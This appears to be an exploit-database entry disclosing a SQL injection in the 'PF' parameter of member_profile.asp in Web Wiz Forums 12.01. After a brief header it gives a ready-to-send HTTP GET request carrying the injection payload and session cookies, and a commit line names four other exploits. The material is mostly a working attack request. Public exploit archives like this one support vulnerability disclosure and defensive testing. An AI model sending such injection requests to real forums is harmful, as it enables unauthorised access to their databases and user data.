2c0d2ff550
5 changes to exploits/shellcodes GetGo Download Manager 6.2.2.3300 - Denial of Service EyesOfNetwork 5.1 - Authenticated Remote Command Execution Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion Integria IMS 5.0.86 - Arbitrary File Upload Web Wiz Forums 12.01 - 'PF' SQL Injection
19 lines
No EOL
769 B
Text
19 lines
No EOL
769 B
Text
# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection
|
|
# Date: 2019-09-16
|
|
# Exploit Author: n1x_ [MS-WEB]
|
|
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm
|
|
# Version: 12.01
|
|
# Tested on Windows
|
|
|
|
# Vulnerable parameter: PF (member_profile.asp)
|
|
# GET Request
|
|
|
|
GET /member_profile.asp?PF=10' HTTP/1.1
|
|
Host: host
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD
|
|
Connection: close
|
|
Upgrade-Insecure-Requests: 1 |